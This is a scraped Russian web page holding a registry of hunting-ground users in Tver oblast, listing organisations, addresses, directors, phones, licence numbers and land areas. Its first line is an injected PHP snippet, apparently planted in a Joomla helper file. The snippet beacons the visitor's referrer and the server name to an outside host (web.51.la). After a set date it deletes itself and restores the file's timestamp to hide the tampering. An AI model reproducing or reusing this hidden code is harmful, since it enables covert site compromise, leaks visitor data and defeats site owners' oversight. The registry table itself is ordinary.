check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Реестр охотопользователей Тверской области

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 3953 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

Реестр охотопользователей Тверской области

Реестр охотопользователей Тверской области

Наименование юридического лица (тел, адрес) Серия и № долгосрочной лицензии, срок действия Площадь тер., представл. для долгосроч. пользования, тыс. га
Наименование юридического лица, район адрес тел. ФИО руководителя
Андреапольское РООиР 172800, г. Андреаполь, Базарная пл. 48-267-3-10-31 Козлов Николай Владимирович ХХ 4596
09.07.01-09.07.11
158,6000
Бельское РООиР 172530, г. Белый, ул. Ленина, 2а-1 48-250-2-27-56 Ерохин Владимир Владимирович ХХ 4607
11.09.01-11.09.11
144,1000
Бологовское РООиР 171070, г. Бологое, ул. Некрасова, 13а 48-238-2-22-19 Долгинский Александр Анатольевич ХХ 5308
18.06.03-25.07.11
158,3000
Вышневолоцкое РООиР 171150, г. В.Волочек, ул. Рабочая, 32а 8-48-233-6-43-56 Фокин Борис Алексеевич ХХ 3444
31.07.00-31.07.10
210,0000
Весьегонское РООиР 171720, г. Весьегонск, ул. Жигарева, 30 48-264-2-21-49 Демченко Евгений Михайлович ХХ 4615
22.08.01-22.08.11
109,5000
Калязинское РООиР 171570, г. Калязин, ул. Красноармейская, 1-а 48-249-2-19-47, 2-02-26 Чередников Евгений Владимирович ХХ 4597
11.07.01-11.07.11
85,0000
Кашинское РООиР 171640, г. Кашин, ул. Песочная, 18а 48-234-200-67 Кулишкин Авенир Георгиевич ХХ 4595
26.06.01-06.06.11
135,0000
Кимрское РООиР 171500, г. Кимры, ул. Володарского, 57 48-236-3-12-15 Шуваев Валентин Николаевич ХХ 4604
31.07.01-31.07.11
113,0000
Конаковское РООиР 171250, г. Конаково, пл. Базарная 48-242-4-19-52 Крапивин Юрий Александрович ХХ 3437
29.08.00-29.08.10
57,6000
Краснохолмское РООиР 171660, г. Красный Холм, ул. Ленина, 98/33 (237) 2-25-84 Карабчеев Геннадий Николаевич ХХ 4598
09.07.01-09.07.11
95,2000
Кесовогорское РООиР 171470, п. Кесова Гора, ул. Полевая, 5 (274) 2-15-49 Баскаков Сергей Алексеевич ХХ 3458
31.07.00-31.07.10
59,9000
Кувшиновское РООиР 172110, г. Кувшиново, ул. Семашко, 9-а (257) 4-56-60 Нилов Александр Павлович ХХ 4663
14.11.01-14.11.11
114,6000
Лихославльское РООиР 171210, г. Лихославль, ул. Севастьянова, 72 48-261-2-10-49 Черткова Нина Федоровна ХХ 4609
01.10.01-01.10.11
100,3860
Лесное РООиР 171890, п. Лесное, ул. Дзержинского, 27 48-271-2-15-85 Розанов Александр Викторович ХХ 3459
31.07.00-31.07.10
68,7000
Максатихинское РООиР 171900, пос. Максатиха, Базарная пл., 2 (253) 2-14-45 Тихомиров Владимир Евгеньевич ХХ 3440
27.09.00-27.09.10
231,3000
Молоковское РООиР 171680, п. Молоково, ул. Советская, 51 (275) 2-36-88 Федотов Юрий Григорьевич ХХ 4653
24.07.01-24.07.11
90,0000
Нелидовское РООиР 172520, г. Нелидово, ул. Панфилова ,1 (266) 3-35-78 Яковлев Николай Васильевич ХХ 5281
26.04.02-26.04.12
96,6000
Оленинское РООиР 172400, п. Оленино, ул. Гагарина, 4а (258) 2-13-57 Живцов Юрий Алексеевич ХХ 6161
29.12.03-27.11.11
40,8000
Осташковское РООиР 172730, г. Осташков, Ленинский пр-т, 18 48-235-5-41-46 Осипов Алексей Васильевич ХХ 3446
23.10.00-23.10.10
154,7000
Рамешковское РООиР 171400, п. Рамешки, Спортивный пер., Дом охотника 8-920-160-50-46 Зверьков Василий Алексеевич ХХ 4654
24.07.01-24.07.11
123,0000
Сандовское РООиР 171750, п. Сандово, ул. Соболинская, 1 48-272-2-12-06 Крылов Василий Алексеевич ХХ 4651
25.07.01-25.07.11
103,0000
Селижаровское РООиР 172200, п. Селижарово, Базарная пл. 48-269-2-22-36 Веселов Борис Иванович ХХ 3454
02.03.01-02.03.11
135,0000
Спировское РООиР 171170, п. Спирово, ул. Карабиха, 35 48-276-2-11-73 Арсеньев Иван Андреевич ХХ 4655
24.07.01-24.07.11
93,9000
Старицкое РООиР 171360, г. Старица, ул. Ленина, 8 48-263-2-33-55 Коровкин Вячеслав Евгеньевич ХХ 3442
23.10.00-23.10.10
184,6070
Пеновское РООиР 172770, п. Пено, ул. Лесная, 20 48-230-2-32-24 Коржан Иван Аксентьевич ХХ 3445
23.10.00-23.10.10
102,9000
Торжокское РООиР 172000, г. Торжок, ул. Красная Гора, 22а 48-251-9-17-21 Рукавишников Игорь Михайлович ХХ 3452
12.02.01-12.02.11
230,4000
Торопецкое РООиР 172840, г. Торопец, ул. Комсомольская , 7а 48-268-2-19-06 Иванов Виктор Сергеевич ХХ 6160
19.12.03-31.07.10
210,2000
Удомельское РООиР 171840, г. Удомля, ул. Пионерская, 32 48-255-5-53-27 Петров Сергей Николаевич ХХ 3443
23.10.00-23.10.10
222,1000
Региональная общественная организация Тверское областное общество охотников и рыболовов (Калининский, Рамешковский,
Конаковский, В.Волоцкий районы)
170006, г. Тверь, ул. Циммервальдская, 1/40 32-09-37 Никитин Валерий Иванович    
«Кушалинское» ОРХ     ХХ 4660
01.08.01-01.08.11
63,0000
«Белавинское» ОРХ     ХХ 4661
01.08.01-01.08.11
35,0000
«Тургиновское» ОРХ     ХХ 5292
26.09.02-26.09.27
42,0000
ФГУ ГООХ «Медведица» (Кимрский, Кашинский, Бежецкий, Кесовогорский, Рамешковский р-ны)
171640, Кашин, Песочная, 1/16 48-234--2-09-14 Журкин Геннадий Викторович ХХ 4582
10.04.01-10.04.26
98,3000
ФГУ ГООХ «Селигер» (Осташковский, Селижаровский) 172730, Осташков, Магницкого,73 48-235-5-07-42 Протасов Николай Павлович ХХ 4586
11.04.01-11.04.26
136,0000
    ХХ 4587
11.04.01-11.04.26
135,4000
ФГУ ГООХ "Безбородово" (Торжокский, Конаковский,
Лихославльский)
171266, Конаковский р-н, п/о Мокшино, д. Безбородово 539-20-23 Гончаров Алексей Васильевич    
Конаковский р-н, п/о Мокшино     ХХ 4588
04.06.01-04.06.26
11,7000
Торжокский р-н     ХХ 4589
04.06.01-04.06.26
20,0000
Межрегиональное военно-охотничье общество Московского военного округа Тверская обл., Вышневолоцкий р-н, п. Зеленогорский, левый берег реки Рвянка 48-233-6-73-29 Борисов Юрий Николаевич    
и Московского округа о/х Тверецкое»     ХХ 4594
08.06.01-08.06.11
6,2000
противовоздушной обороны о/х «Рютинское»     ХХ 4593 15,5000
(о/х Шитовское-В.Волоцкий,       08.06.01-08.06.11  
о/х Рютинское-Бологовский, о/х Тверецкое - Спировский) о/х «Шитовское»     ХХ 4657
24.07.01-24.07.11
45,5000
Военно-охотничье общество – общероссийская спортивная общественная организация (Кашинский,
Калязинский, Кимрский)
171590, Тверская обл. Калязинский р-н, п/о Скнятино, охохозяйство 8-48-249-2-18-07 Панченко Александр Дмитриевич ХХ 5314
14.09.00-14.09.49
58,3000
Межрегиональное военно-охотничье Общество Генерального штаба Вооруженных Сил РФ военно- охотничьего общества- общероссийской спортивной общественной организации (о/х Заболотское-Калязинский) 121019, Москва, Крестовоздвижинский пер., 2, стр. 2 495-296-71-12 Глушков Виктор Петрович ХХ 4580
11.04.01-11.04.11
16,8000
ООО «Цна» (Кувшиновский р-н) 172110, г. Кувшиново, ул.Советская, 55 8-903-803-76-29 Морозов Николай Васильевич ХХ 3450
12.02.01-12.02.11
26,5000
ГУП «Конаковское ДРСУ» 171250, Тверская обл., г.Конаково ул. Белавинская, 63 48-242-4-23-44, 4-45-64 Низов Павел Иванович ХХ 5294
06.11.02-06.11.27
2,5000
ООО «Промысловое охотничье-рыболовное предприятие «Мец» (Вышневолоцкий) 171144, Тверская обл., Вышневолоцкий р-н, д. Гряды 48-233-7-54-66 Егоров Виталий Сергеевич ХХ 3441
03.10.00-03.10.10
11,0000
ООО «Охотничье хозяйство «Шолоховское» ОАО «Высота» (Ржевский) 172380, г. Ржев, ул. Краностроителей, 32 48-232-2-25-01, 2-04-03 Анущенков Василий Егорович ХХ 3448
27.09.00-27.09.49
65,9000
ООО «Компания «Тристар» (Пеновский) 172770, Тверская обл., пгт. Пено, ул. 249 Стрелковой дивизии, 36 48-230-3-14-40 Вишняков Олег Борисович ХХ 3449
12.02.01-12.02.11
10,7000
ООО «Руссо-Диз» (Пеновский, Сонковский, Кесовогорский р-ны) Тверская обл., п. Пенно, ул. Родина, 38 8-920-156-17-00 Шитиков Николай Александрович    
Пеновский р-н.     ХХ 4606
19.09.01-19.09.50
6,7000
Сонковский р-н     ХХ 5307
18.06.03-18.06.52
8,0000
Пеновский р-н.     ХХ 6152
21.11.03-21.11.52
12,1000
Сонковский р-н     ХХ 7922
18.11.05-18.11.54
4,0690
Кесовогорский р-н     серия 69 № 0000019
24.02.09-24.02.58
1,8000
ООО «Орбита-Сервис» (Вышневолоцкий) 171150, г. В.Волочек, ул. Парижской Коммуны, 43/46 48-233-6-22-72, 6-15-70 Хасаинова Галина Витальевна ХХ 4605
03.09.01-03.09.11
13,1000
ЗАО «Строительная фирма «Сапсан» (Торопецкий) Тверская обл., Торопецкий р-н, д. Уварово, Пашинцеву М.Е. 8-48-268-2-72-04 Кошкин Сергей Львович ХХ 3457
16.12.99-16.12.48
30,0000
ООО "Залесье" (Торжокский) 172042, Тверская обл., Торжокский р-н, д. Стружня, 69-4 48-251-5-33-61,5-33-52 Смирнов Владимир Николаевич ХХ 6167
30.05.05-14.12.48
17,0000
ЗАО «Сервис «Делового Мира» Москва, пр. Мира, 57        
о/х «Холмы»     ХХ 3462
06.01.00-06.01.49
8,7000
о/х «Горские Устья»     ХХ 3461
06.01.00-06.01.49
5,5000
о/х «Заречье»     ХХ 3463
06.01.00-06.01.49
9,0500
о/х «Горские Устья»     ХХ 3436
29.08.00-29.08.49
14,9000
о/х «Горские Устья»     ХХ 3456
29.08.00-29.08.49
4,0000
Тверская региональная общественная организация охотников «Егеръ» 172770, Тверская обл. п. Пено, Лесная, 20а 34-56-28 Полуйко Юрий Васильевич    
о/х «Горские Устья»     ХХ 3455
10.04.01-10.04.50
35,0000
о/х «Холм»     ХХ 4602
25.07.01-25.07.50
26,2000
о/х «Покровское»     ХХ 4603
25.07.01-25.07.50
16,0000
о/х «Заречье»     ХХ 4601
25.07.01-25.07.50
36,0000
о/х «Добрынинское»     ХХ 4608
01.10.01-01.10.50
12,0000
о/х «Ивановское»     ХХ 4662
26.10.01-26.10.50
22,0000
о/х «Добрый Бор»     ХХ 4614
07.02.02-07.02.51
12,0000
о/х «Горские Устья»     ХХ 5278
22.02.02-22.02.51
3,2000
о/х «Нелидовское»     ХХ 5285
03.06.02-03.06.51
8,5000
о/х Фировское     ХХ 5286
29.07.02-29.07.51
32,0000
о/х «Горские Устья»     ХХ 5291
19.09.02-19.09.51
11,5000
о/х «Горские Устья»     ХХ 5312
04.08.03-04.08.52
10,1000
о/х Андреапольское     ХХ 5301
21.04.03-21.04.52
22,7000
о/х «Ивановское»     ХХ 5302
28.04.03-28.04.52
23,0000
о/х «Торопа»     ХХ 5303
07.05.03-07.05.52
25,0000
о/х»Северный холм»     ХХ 6171
15.09.05-15.09.54
32,3000
Торопецкий р     ХХ 7929 16.05.06-16.05.55 35,3000
Нелидовский р     ХХ 7930 16.05.06-16.05.55 4,7750
Нелидовский р     ХХ 7931 16.05.06-16.05.55 4,8360
Молоковский     О 0000791 23.04.07-16.03.56 3,2000
Молоковский     О 0000792 23.04.07-16.03.56 23,3000
Пеновский     серия 69 № 0000050
03.03.10-03.03.59
16,5000
ООО «Эльта» (Лесной) 170024, г. Тверь, пр. 50 лет Октября, 3   Данильченко Александр Васильевич ХХ 5277
21.02.02-21.02.12
25,2000
Тверская областная общественная организация охотников и рыболовов «Ферязкино» (Калининский, Лихославльский р-ны) г. Тверь, ул. Попова, 29   Фомин Валентин Григорьевич ХХ 5326
22.02.02-22.02.51
19,0000
ООО «Дубакинское» (Бежецкий) Тверская область, Бежецк, пер. Воздвиженский, 43 48-231-2-19-79, 2-32-91 Дунаев Юрий Александрович ХХ 5279
18.04.02-18.04.51
33,8080
Тверское региональное общественное учреждение охотников и рыболовов (ТРОУ) «Межа» (Западнодвинский) 172610, Тверская обл., г. Западная Двина, ул. Школьная, 15 48-273-2-54-38 Быков Сергей Дмитриевич ХХ 5280
18.04.02-18.04.51
38,5000
ЗАО «Агрофирма «Дмитрова Гора» (Конаковский) 171290, Тверская область, Конаковский р-н, с. Дмитрова Гора, ул. Центральная 48-242-4-31-28 Боргуль Владимир Андреевич ХХ 5282
07.05.02-07.05.51
11,1300
Государственный комплекс «Завидово» Федеральной службы охраны России (Калининский, Конаковский) 171274, Тверская область, Конаковский р-н, п. Козлово 495-539-20-48 Егоров Александр Николаевич ХХ 5283
07.05.02-07.05.51
68,7000
ООО «Охотхозяйство «Колкуново» (Кимрский) 171501, Тверская область, Кимрский р-н, Плешково, 101 48-236-2-51-03 Буянов Сергей Александрович ХХ 5284
22.05.02-22.05.27
10,5000
Некоммерческое партнёрство «Спортивно-охотничий клуб «Румелко-Спортинг» (Кашинский) 171600, г. Кашин, ул. Песочная, 18-а 48-234-2-00-67 Кулишкин Эдуард Авенирович ХХ 5288
16.08.02-16.08.27
8,1000
Открытое акционерное общество «Раздолье» (Оленинский) 141200, Москва, Пушкино, Московский пр-т, 55 495-993-41-81 Кулик Николай Васильевич ХХ 5289
16.08.02-16.08.51
8,0000
ХХ 6155
31.10.03-31.10.52
8,0000
Общество с ограниченной ответственностью «Опос» (Рамешковский) 170028, Тверь, наб. р. Лазури, д. 15а 48-01-51 Желев Александр Стоянович ХХ 5290
22.08.02-22.08.51
16,0000
«Кашинское районное общественное учреждение охотников и рыболовов «Корожечна» (КРОУОР «Корожечна») 171602, Тверская обл., Кашинский р-н, Шепелевский с/о, д. Шепели, колхоз «Заря» 48-234-6-17-29 Воробьева Татьяна Николаевна ХХ 5287
16.08.02-16.08.27
8,9000
ООО «Заря» (Осташковский) 172730, Тверская обл., г. Осташков, ул. Магницкого, 73 48-235-5-36-34 Бойков Юрий Валентинович ХХ 5293
06.11.02-06.11.51
16,7000
ООО «Подсобное хозяйство «Нестерово» (Калининский) 170558, Тверская обл., Калининский р-н, д.Волосово   Росинский Михаил Юрьевич ХХ 5296
06.11.02-06.11.27
3,2000
Общество с ограниченной ответственностью «Корус» (ООО «Корус) 170034, г. Тверь, пр-т Чайковского, д. 9 48-92-14 Кашенков Григорий Викторович    
Нелидовский р-н     ХХ 5297
16.01.03-16.01.52
36,0000
Бельский р-н     О 0000777
29.09.06-29.09.55
12,1000
ТООУОиР "Квант" 170016, г. Тверь, ул. Загородная, 5а 41-37-96 Орехов Алексей Юрьевич    
Весьегонский р-н     ХХ5311
25.07.03-25.07.28
16,3000
Кесовогорский р-н     ХХ 6154
27.11.03-27.11.28
10,9000
ТООУОиР «Квант-Удомля» 170002, г. Тверь, ул.Склизкова, 10, кв. 222   Еременко Степан Николаевич О 0000810 27.11.07-04.08.28 15,7000
Некоммерческое партнёрство «Зурбаган» (Кувшиновский) 170026, г. Тверь, Комсомольский пр-т, 12а   Вавин Валерий Марсович ХХ 5299
04.02.03-04.02.28
12,0000
Бологовская районная общественная организация охотников и рыболовов «Хотилово» (Бологовский) Тверская обл., г.Бологое, Заозерный м-н, 3-69 48-238-3-21-13 Петреев Николай Николаевич ХХ 5300
16.04.03-16.04.52
13,6000
ООО «Меж транс групп» (Спировский) 143402, г. Москва, Главпочтампт, а/я 872 495-784-64-95 Беспутин Александр Борисович ХХ 5305
13.05.03-13.05.52
14,8000
ООО «Легион» (Оленинский) Тверскаяобл.,
Оленинский р-н, д. Холм
495-922-73-26 Платонов Василий Викторович ХХ 5306
18.06.03-18.06.52
40,0000
ООО «Медведь» (Лесной) 171881, Тверская обл., Лесной р-н, п. Медведково, ул.Заречная, 6 8-495-763-51-36 Лихачев Геннадий Петрович ХХ 5309
14.07.03-14.07.52
14,5000
Тверское областное общественное учреждение охотников и рыболовов «Русь» (Бежецкий) 170017, г. Тверь, ул. Бочкина 15, ТВ «Голованёв и К» 49-20-41 Голованев Алексей Николаевич ХХ 5310
25.07.03-25.07.52
26,0000
Тверская областная общественная организация «За экологию» (Максатихинский) г. Тверь, пр-т Победы, 53 48-253-2-28-48 Скрипкина Надежда Леонидовна ХХ 5315
14.08.03-14.08.52
14,0000
ОАО «Рыболовецкое хозяйство «Горское» (Весьегонский) 171271, Тверская обл., г.Весьегонск, Промышленная пл.,1 48-264-2-27-98 Фомин Николай Михайлович ХХ 5317
22.08.03-22.08.52
10,0000
Оленинское районное общественное учреждение охотников и рыболовов «Дубряне» (Оленинский) 172430, Тверская обл., Оленинский р-н, п. Мирный, ул. Юбилейная, д. 1-а   Сергеева Ирина Анатольевна ХХ 5319
01.09.03-01.09.52
20,0000
Некоммерческое партнёрство «Общество охотников и рыболовов «Якшинское» (Кимрский) 171502, Тверская обл., г.Кимры, ул.Орджоникидзе, 70 48-236-2-92-61 Торубаров Николай Николаевич ХХ 5318
01.09.03-01.09.28
16,6000
Общественное объединение «Российская Ассоциация общественных объединений охотников и рыболовов» (Росохотрыболовсоюз) (о/х Калининское-Калининский, Рамешковский, Кимрский) г. Москва, Головинское шоссе, д. 1-а 495-452-13-36 Бендерский Эдуард Витальевич ХХ 5320
04.09.03-04.09.28
61,0000
ООО «Ветераны разведки – Ватутинки» (Оленинский) Тверская обл., Оленинский р-н, с.Холмец-Широкову А.А. 495-956-06-05 Чижов Александр Михайлович ХХ 5323
28.10.03-28.10.52
7,6000
Тверское областное общественное учреждение охотников и рыболовов «Мастер» Тверская область, Весьегонский район, д. Противье, ул. Рыбацкая, д. 59 485-999-92-07 Евминенко Сергей Петрович ХХ 6157
05.12.03-05.12.52
8,7500
ООО «Белка» 171472, Тверская область, Кесовогорский район, д. Вязовец 48-274-2-12-96 Крылов Василий Анатольевич    
Кесовогорский     ХХ 6153
27.11.03-27.11.52
9,1000
Бежецкий, Сонковский     серия 69 № 0000008 от 14.11.2008 26,3710
Оленинская районная общественная организация «Потемкинское общество охотников и рыболовов» «Немые плесы» (Оленинский) 172412, Тверская область, Оленинский район, д. Козаково 495-248-69-07 Митрохин Михаил Юрьевич ХХ 6158
28.10.03-28.10.52
6,0000
Тверское областное общественное учреждение охотников и рыболовов «Ворчала» (Старицкий) 170000, г. Тверь, пер. Смоленский, д. 29 48-263-2-17-01 Юшин Николай Алексеевич ХХ 6156
05.12.03-05.12.52
23,3000
Закрытое акционерное общество «НОРМИКС» (Андреапольский) 143530, Московская обл., Истринский р-н, г.Дедовск, ул.1-я Волоколамская, 76 а 495-994-88-33; 48-267-3-31-21 Киреев Сергей Николаевич ХХ 5324
12.11.03-12.11.52
19,6000
ХХ 6177
26.09.05-26.09.55
42,4000
ООО «Восход» (Бежецкий) 171950, Тверская обл., г.Бежецк, ул.Рыбинская, 4   Ильин Сергей Николаевич ХХ 6159
29.12.03-29.12.52
25,8000
Жарковское районное общественное учреждение охотников и рыболовов "Межа-М" (Жарковский) 172456, Жарковский район, Сычевский сельский округ, д. Сыр, дом Быкова С.Д. 985-364-48-81 Комиссаров Юрий Анатольевич ХХ 5322
15.10.03-15.10.52
15,7000
ООО «Полубратовское охотхозяйство» (Старицкий, Калининский) Тверская обл., д. Нестерово, ул. Восточная, д. 10   Деревянко Игорь Михайлович ХХ 6163
10.02.04-10.06.11
30,8000
ЗРОУОиР «Ильинское» (Западнодвинский) 172630, Тверская обл., Западнодвинский р-н, п.Старая Торопа, ул.Спортивная, Иванову   Титов Игорь Егорович ХХ 6169
12.07.05-12.07.54
45,2000
Зубцовская районная общественная организация охотников и рыболовов «ОХОТНИК» (Зубцовский)
172330, Тверская обл., г.Зубцов, ул. Октябрьская, 2   Иванов Николай Ильич XX 7925
14.02.06-14.02.55
48,9500
Тверское региональное общественное учреждение охотников и рыболовов «Колибри» (Оленинский)
170000, г. Тверь, пр-т Чайковского, 27/32, оф.0216   Кириллов Александр Алексеевич ХХ 6172
09.09.05-09.09.54
10,0000
Общество с ограниченной отвественностью «Авто-Р» (Рамешковский)
г. Тверь, п/о - 1, а/я - 01228 или Двор Пролетарки,19
45-00-19 Горшков Николай Иванович ХХ 6178
11.10.05-11.10.54
11,0000
ООО «Русский охотничий клуб» (Зубцовский) 172333, Тверская обл., г. Зубцов ул. Вокзальная д. 1 495-768-40-71 Брусенский Сергей Алексеевич ХХ 6173
09.09.05-09.09.54
14,4000
ООО «С.Б.-2» (Зубцовский) 125222, г.Москва, ул.Пенягинская, 8-1
495-768-40-71 Брусенский Сергей Алексеевич ХХ 6174
09.09.05-09.09.54
8,8400
ООО «Большая Медведица» (Калининский) г. Тверь, пер. Вагонников, 66 Калинину И.А. 36-37-80 Рыбин Евгений Анатольевич ХХ №7924
23.12.05-23.12.54
31,5000
Жарковская районная общественная организация охотников и рыболовов «Щучье озеро» (Жарковский)
172460, Тверская область, пос. Жарковский, ул. Заводская, д. 6   Кондратьев ХХ № 6180
15.07.05-15.07.54
21,3000
ХХ № 7923
02.12.05-02.12.54
14,9000
серия 69 № 0000013
22.11.08-22.11.57
10,3000
ООО «Сезон охоты», Зубцовский р-н. 172330, Тверская обл., г.Зубцов, ул.Зверева, 53   Баранов Валерий Викторович ХХ № 7927
17.03.06-17.03.55
6,4000
ООО «Сезон охоты», Ржевский р-н. 172332, Тверская обл., г. Зубцов, ул. Парижской Коммуны, д. 41   Баранова Ирина Федоровна серия 69 № 0000038
18.11.09-18.11.58
7,327
МОО "Добровольное общество любителей птиц" (Бежецкий) 119002, г. Москва, пер.Сивцев Вражек, д.32 48-231-2-12-54 Петров Сергей Владимирович ХХ 6170
12.08.05-12.08.54
41,1000
Общество с ограниченной ответственностью «Канадаспецтехнострой» (Зубцовский) 143581, Московская обл., Истринский р-н, с.Павловская Слобода, а/я № 4, ООО «Комсервис» 495-997-22-12 Шафир Сергей Борисович XX № 7926
03.04.06-03.04.55
19,0000
ООО «Природа» (Калязинский) 171573, Тверская область, г. Калязин, ул. Заводская, д. 8а   Комаров Александр Арнольдович ХХ № 7928
16.05.06-16.05.55
4,2000
ООО «За экологию» (Максатихинский) 170037, г. Тверь, пр-т Победы, д. 53 48-253-2-28-48 Скрипкина Надежда Леонидовна О 0000761
24.05.06-24.05.55
11,0000
ООО «Батуринское» 172505, Тверская обл., Нелидовский р-н, д.Талухино 48-92-14 Иванов Иван Иванович ХХ 5325
18.11.03-18.11.52
18,0000
Бельский     О 0000762
26.07.06-26.07.55
3,4000
Нелидовский     О 0000763
26.07.06-26.07.55
8,6000
ООО «Агентство экологической безопасности» (Зубцовский) 170008, г.Тверь, пр-т. Победы, 35
495-106-55-98 Степанов Михаил Иванович О 0000764
22.06.06-22.06.55
21,4000
ТООУ ОиР «Коша» (Старицкий) 170556, Тверская обл., Старицкий р-н, с.Берново, ул.Лесная, 14
  Бруй Иван Константинович О 0000766
19.07.06-19.07.55
18,0000
ЗАО «Возрождение» (Бологовский) 175421, Новгородская обл. Валдайский р-н, д. Ключи, 23 8-816-66-31-202 Голубева Ирина Георгиевна О 0000767
19.07.06-19.07.55
11,8000
ТООУОиР «Берново» 170556, Тверская обл., Старицкий р-н., пос. Берново, ул. Лесная, 14 495-705-66-00 Шагинян Самвел Григорьевич О 0000768
09.08.06-09.08.55
10,0000
НП «Общество охотников и рыболовов «Чичатское» (Бельский) Тверская обл., Бельский р-н, д.Рожино, ул. Центральная, д.1
  Бацаев Сергей Анатольевич О 0000770
22.08.06-22.08.55
29,3000
ООО «СиБОСС-Охота» (Андреапольский)
172770, Тверская обл., п.Пено, ул.249 Стрелковой Дивизии, 36
  Козлов Алексей Дмитриевич О 0000771
23.08.06-22.08.55
24,0000
Некоммерческое партнерство первичной организации охотников и рыболовов «ОРДЫНОК» (Жарковский)
172460, Тверская обл., пос.Жарковский, ул.Полевая, 7
  Кочетыгов Николай Петрович О 0000772
12.09.06-12.09.55
23,5500
ООО «Нестеровское охотхозяйство» (Бельский)
172530, Тверская обл., г.Белый, ул.Нила Петрова, 38 а (ул.Латышева,18-1)
48-250-2-22-18 Хакуй Гисса Газаватович О 0000773
12.09.06-13.09.55
15,1000
Некоммерческое партнерство «Научно-производственная лаборатория дичеразведения и организации охот» (Нелидовский)
115054, г.Москва, ул.Дубининская, д.71,стр. 1
495-633-09-11 Алискеров Сергей Вадимович О 0000774
12.09.06-12.09.55
17,2000
ООО «Гранис» (Оленинский) 119021, г.Москва, Комсомольский пр-т, д. 5/2. 495-247-02-57 Чебурахин Сергей Юрьевич О 0000776
19.09.06-19.09.55
6,6000
Тверская региональная общественная организация «Общество охотников и рыболовов «Медведица» (Оленинский) Тверская обл., Оленинский р-н, д..Медведица
  Козлов Николай Иванович О 0000765
11.07.06-11.07.55
20,3000
ООО "Инвест-Центр"
(Бельский)
119034, г. Москва, Левшинский М. пер., д. 7, стр. 1 495-786-18-88 Зимин Денис Евгеньевич О 0000780
27.12.06-27.12.55
8,1000
ООО «Охотничье хозяйство «Горское» (Весьегонский) 171271, Тверская обл., г.Весьегонск, Промышленная пл.,1 48-264-2-27-98 Фомин Николай Михайлович О 0000778
29.11.06-22.08.52
10,0000
ООО «Узмень» (Фировский) ул. Советская, д. 21, кв. 7, п. Фирово, Тверская область   Богданов Юрий Валентинович О № 0000781 29.12.06-29.12.55 38,4000
ООО «Ручей Стрельный» (Фировский) 172704, Тверская обл., Фировский р-н, дер. Дубровка, 81
48-239-5-22-32 Петров Павел Валерьевич О № 0000788 13.03.07-13.03.56 8,8300
О № 0000789
13.03.07-13.03.56
10,9700
ООО «Вектор» (Фировский) 170100, г.Тверь, пл. Славы, д. 2 кв. 17 Шелковой С.А.
35-70-94 Хабаева И.А. О № 0000787 28.02.07-28.02.56 45,4400
ООО «Охотхозяйство Покровское» (Кимрский) 171506, Тверская обл., г. Кимры, ул.Кирова, 4
8-495-795-81-39,
8-495-787-78-68
Зуев Михаил Анатольевич О № 0000784 07.02.07-07.02.56 9,1554
ООО «Русская Венеция» (Вышневолоцкий) 171100, г. Вышний Волочек, ул. Бейшлотская наб., 47 для Борькина В.В.
48-233-5-83-66 Борькин В.В. О № 0000783 14.02.07-14.02.56 11,0000
ООО «Медведь» (Калининский и Торжокский районы) Тверская обл., Калининский р-н, Кумординский с/о, д.Рождество, охотбаза
38-62-39 Логинов Николай Васильевич О № 0000786 19.02.07-19.02.56 5,0000
ООО «Шегра» (Спировский)
170001, г. Тверь, ул. Веселова д.12. кв. 1   Курилкин Сергей Николаевич О 0000790
20.04.07-20.04.56
19,9000
ООО «Вепрь» (Краснохолмский) 170000, г. Тверь, ул. Трехсвятская, 6, офис 320   Карасев Андрей Владимирович О № 0000794
05.07.07-05.06.56
15,4000
ООО «Лесная гать» (Сонковский )
171141, Тв. Обл. Сонковский р-, с. Кой   Букетов Алексей Валентинович О № 0000797
07.08.07-12.07.56
14,2100
ООО «Тверь-Сафари» (Сонковский )
171650, Тверская обл., Сонковский р-н, д. Бережки, адм. здание СПК Бережки
  Катков Александр Михайлович О № 0000800
27.08.07-26.06.56
20,0000
ООО «Кувшинки» (Сандовский )
109147, г. Москва, пер. Маяковского, д.10, стр. 6 48-272-2-11-84 Гальперин Леонид Львович О № 0000804
31.08.07-26.06.56
18,3000
Общественная организация охотников и рыболовов «Верхневолжская» (Пеновский)
172770, п. Пено, пр-т Коммунаров, 45
48-230-2-18-51,
2-23-29
Барсуков Юрий Витальевич О № 0000799
15.08.07-26.06.56
21,1000
ООО «Тандем» (Западнодвинский )
172610, Тверская обл., г. Западная Двина, ул. Горького, 34а
    О № 0000805
10.09.07-26.06.56
30,0880
ООО «Скопа» Сонковский район 171446, Тверская обл., Сонковский р-н, д. Марково, 12
  Коваль Александр Михайлович О № 0000806
03.10.07-04.09.56
23,1000
ООО «Утиная охота» (Калининский, Конаковский р-ны)
г. Москва, Нахимовский пр. д. 24, стр. 1
8-48-242-40-016 Шандов Юрий Александрович О № 0000807
20.11.07 – 09.10.56
3,8330
ООО «Охотресурс» (Зубцовский р-н)
Тверская обл., Зубцовский р-н, д. Борки, ул. Парковая, 34
48-262-2-23-06 Совертков Федор Исаакович О № 0000809
20.11.07 – 28.09.56
11,3502
Некоммерческое партнерство «Тверская охота» (Конаковский) 171293, Тверская обл., Конаковский р-н, д. Ручьи
8-906-550-06-94 Те Сергей Петрович 69 № 000001
06.11.08-06.11.57
14,1390
ООО «Изюбрь» (Бологовский р-н) село Коломно, д. 82, Вышневолоцкий район, Тверская область, 171118 8-903-722-29-66 Леонов Яков Викторович 69 № 000002
05.11.08-05.11.57
18,6046
ООО «Профиль» (Зубцовский ) 170006, г. Тверь, Краснофлотская набережная, д.9 35-56-31 Сальник Константин Владимирович 69 № 000003
05.11.08-05.11.57
31,2380
Некоммерческое партнерство «Дипломатический охотничий клуб» (Конаковский р-н) г. Тверь, наб. Степана Разина, д. 20 495-788-95-26 Лозинская Анна Николаевна 69 № 000004
06.11.08-06.11.57
5,2000
ООО «Русская Охота» (Лесной р-н) 171890, Тверская область, Лесной район, с. Лесное, ул. Дзержинского, д. 29 48-271-2-12-71 Владиславлев Павел Иванович 69 № 000005 (0000017)
